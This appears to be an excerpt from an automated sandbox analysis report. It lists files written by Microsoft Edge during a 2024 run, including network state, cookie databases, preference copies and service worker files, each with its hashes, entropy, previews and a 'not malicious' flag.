Preview:	2024/12/18-15:09:22.746 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:09:22.748 aa8 Recovering log #3.2024/12/18-15:09:22.751 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0522bac9-66de-47ec-a283-b3c3f82f7522.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\20f6a6c3-12ee-43ed-8c99-fbfd4551fbcd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\29481496-9506-4c27-b353-1dab07047e34.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.299581843702865
Encrypted:	false
SSDEEP:	24:YcCp/WRdsyEyZVMdmwC5mWRdsXZFRudFGRw6ma3yeesw6C1VdsyyZFGJ/I3w6ma0:YcCpWs6uCvsJfc7leeBRsfgCgkhYhbp
MD5:	4AD71DB0B888FDAC96A9AF49EBE24424
SHA1:	0ECC61E908936C3A6021D885A59AD98E305A97A4
SHA-256:	B01FE00714F7B89C8487088BF97EE6288C18D8F1C413F1CBE74EDF41405D8DA0
SHA-512:	478B594C73534F4DCB023ABA2B28100BA6FF29774ABECE70EAE68CBA457A60F28E53BDC6FB448EE168E34F58BF719F79C664906BD1873F1E3F8DF9CD39636872
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561982935006","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561983636053","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9c2410eb-b4bb-4d91-bdf0-42d1d70c941a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7756632841755042
Encrypted:	false
SSDEEP:	192:tTI8ANiZBn/GCMLzJxzvkYqJk63tdcfzXcf0L/ZJVb:VIop+CMLzfVqWzXI0LhJVb
MD5:	9B1A39265217D951FFDBEA752696261C
SHA1:	42B08C1C26DCE8333440597636A495A1444E8CB4
SHA-256:	EC3F1345279E182F471E382F3032C707D7F810788F29B61D74B944AAFEE679D7
SHA-512:	154797424FB9A2592E6E887966FA1FF4BC1BB1EC419230F387D3AA977369C5AF01C75ED200AC213AE1FC2EE7C769872DCC28E42F5545DDB4DBC7E59F9485A53A
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.299581843702865
Encrypted:	false
SSDEEP:	24:YcCp/WRdsyEyZVMdmwC5mWRdsXZFRudFGRw6ma3yeesw6C1VdsyyZFGJ/I3w6ma0:YcCpWs6uCvsJfc7leeBRsfgCgkhYhbp
MD5:	4AD71DB0B888FDAC96A9AF49EBE24424
SHA1:	0ECC61E908936C3A6021D885A59AD98E305A97A4
SHA-256:	B01FE00714F7B89C8487088BF97EE6288C18D8F1C413F1CBE74EDF41405D8DA0
SHA-512:	478B594C73534F4DCB023ABA2B28100BA6FF29774ABECE70EAE68CBA457A60F28E53BDC6FB448EE168E34F58BF719F79C664906BD1873F1E3F8DF9CD39636872
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561982935006","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343561983636053","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:	modified
Size (bytes):	36864
Entropy (8bit):	1.3763710615940243
Encrypted:	false
SSDEEP:	96:uIEumQv8m1ccnvS6JallGFh5uZUPNZw1a:uIEumQv8m1ccnvS6J8Ku0Zr
MD5:	8AFC0C962613D983B5D27A9B4FB269EF
SHA1:	39D392C107FC0D58C8A26B0D6BD1B43D57C46685
SHA-256:	DD41F5C72348547F8B83D123E32BE9F9ACB719540EFF056AA17ED445AADD966C
SHA-512:	A4C7E34A41B3BDA2456E46A8CD882E244C540159CE922ACCE6B2F2D343FE20197B56158EEFFC63BA6F444C9C6FB0646AF9F9BE54083C5F1B8BE62C6140788123
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF358c0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF36bab.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f66771d1-c922-47dd-899d-06a643e6ea04.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9681
Entropy (8bit):	5.1005894189254946
Encrypted:	false
SSDEEP:	192:stgkdp8sIrwIJZVkm0X8nbV+FnwOLQABCN2PpYJ:stgQ8sIrwiZ9bGrQF
MD5:	978A7C7EC7C7B9F335761FCEEBA166C4
SHA1:	E34E4D2A5EB36354E5C8B20C08C829BCB8F6AED9
SHA-256:	E83AC6F3A2D4ACD28373DF63E0AD8246C43292B17F97A3216B82950B7BC002F4
SHA-512:	68130E103F3BD6562332A33A791DD116855A2553B5B85B1CEDAC805622C618C75D7705D81CFA038B3FEB7BE47EA7BC2034797A1901B8CF0A0A2B8446EA5155DA
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3a1de.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9681
Entropy (8bit):	5.1005894189254946
Encrypted:	false
SSDEEP:	192:stgkdp8sIrwIJZVkm0X8nbV+FnwOLQABCN2PpYJ:stgQ8sIrwiZ9bGrQF
MD5:	978A7C7EC7C7B9F335761FCEEBA166C4
SHA1:	E34E4D2A5EB36354E5C8B20C08C829BCB8F6AED9
SHA-256:	E83AC6F3A2D4ACD28373DF63E0AD8246C43292B17F97A3216B82950B7BC002F4
SHA-512:	68130E103F3BD6562332A33A791DD116855A2553B5B85B1CEDAC805622C618C75D7705D81CFA038B3FEB7BE47EA7BC2034797A1901B8CF0A0A2B8446EA5155DA
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3e291.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9681
Entropy (8bit):	5.1005894189254946
Encrypted:	false
SSDEEP:	192:stgkdp8sIrwIJZVkm0X8nbV+FnwOLQABCN2PpYJ:stgQ8sIrwiZ9bGrQF
MD5:	978A7C7EC7C7B9F335761FCEEBA166C4
SHA1:	E34E4D2A5EB36354E5C8B20C08C829BCB8F6AED9
SHA-256:	E83AC6F3A2D4ACD28373DF63E0AD8246C43292B17F97A3216B82950B7BC002F4
SHA-512:	68130E103F3BD6562332A33A791DD116855A2553B5B85B1CEDAC805622C618C75D7705D81CFA038B3FEB7BE47EA7BC2034797A1901B8CF0A0A2B8446EA5155DA
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.557663355667755
Encrypted:	false
SSDEEP:	768:o/pvWc7pLGLhePWPIefCh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVa/4qzrw9Cbx/E5:o/pvWAchePWPIefChu1jaXQqI9Gte
MD5:	A0D49B7BDE872557669B7D0BD650441C
SHA1:	C6FA64F4FA4F97D9C8D5895F1DC23D94FDF3FD40
SHA-256:	3C7A5D021A652C88B1DDEC0BCF9842F0F3D20870536CFFF5A56005B5B8E9382D
SHA-512:	ED87E5DFEF54DAA9A80FB7D8930819C6E1A70C9EE9946B910D4279DA047BC6A0F1A74AAF4F141823B62752D93561BAD72866C224354A6E58151FC739841C205E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3a1ee.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.557663355667755
Encrypted:	false
SSDEEP:	768:o/pvWc7pLGLhePWPIefCh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVa/4qzrw9Cbx/E5:o/pvWAchePWPIefChu1jaXQqI9Gte
MD5:	A0D49B7BDE872557669B7D0BD650441C
SHA1:	C6FA64F4FA4F97D9C8D5895F1DC23D94FDF3FD40
SHA-256:	3C7A5D021A652C88B1DDEC0BCF9842F0F3D20870536CFFF5A56005B5B8E9382D
SHA-512:	ED87E5DFEF54DAA9A80FB7D8930819C6E1A70C9EE9946B910D4279DA047BC6A0F1A74AAF4F141823B62752D93561BAD72866C224354A6E58151FC739841C205E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3d860.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.557663355667755
Encrypted:	false
SSDEEP:	768:o/pvWc7pLGLhePWPIefCh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVa/4qzrw9Cbx/E5:o/pvWAchePWPIefChu1jaXQqI9Gte
MD5:	A0D49B7BDE872557669B7D0BD650441C
SHA1:	C6FA64F4FA4F97D9C8D5895F1DC23D94FDF3FD40
SHA-256:	3C7A5D021A652C88B1DDEC0BCF9842F0F3D20870536CFFF5A56005B5B8E9382D
SHA-512:	ED87E5DFEF54DAA9A80FB7D8930819C6E1A70C9EE9946B910D4279DA047BC6A0F1A74AAF4F141823B62752D93561BAD72866C224354A6E58151FC739841C205E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.323098996850684
Encrypted:	false
SSDEEP:	3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
MD5:	8DA62954B0B14642CF287A260418E39B
SHA1:	E82BF98669AE1D73BBD9294D9F454044D5C2622E
SHA-256:	B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
SHA-512:	E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	293
Entropy (8bit):	5.2035022490824945
Encrypted:	false
SSDEEP:	6:7PQ+MWQk1qLTwi23oH+TcwtE/a252KLlpPQ+MQyFN+q2PqLTwi23oH+TcwtE/a2v:7oiQtwZYeb8xLToDOv8wZYeb8J2FUv
MD5:	6D2E0C8EBB0CD28753844922191C0D25
SHA1:	FF2E3BAB18C84079B6065D24CDB147BCCBFF8E3A
SHA-256:	0672D2DC84FF4323A3734C1873DC454262BECAB5F6EC4D0866C471E649E97A9F
SHA-512:	3307AD3F862162689D75FCDFD6A98D6C52C8E00EEB74E2E61E379FF2B1B41AC56946C99782A6379DBC711AF90BB27E43255F81A44CAA06A1AB4119AE8D310FC9
Malicious:	false
Preview:	2024/12/18-15:09:37.735 7d8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/18-15:09:37.754 7d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114342
Entropy (8bit):	5.580504533019977
Encrypted:	false
SSDEEP:	1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtGbEs7UbX68J8:B9LyxPXfOxr1lMe1nL/5L/TXE6+7oT8
MD5:	32DFD05CBD5F65816A73157CBCC7986D
SHA1:	83729CC465C5B64071A91210ABE66EB2CC48BB92
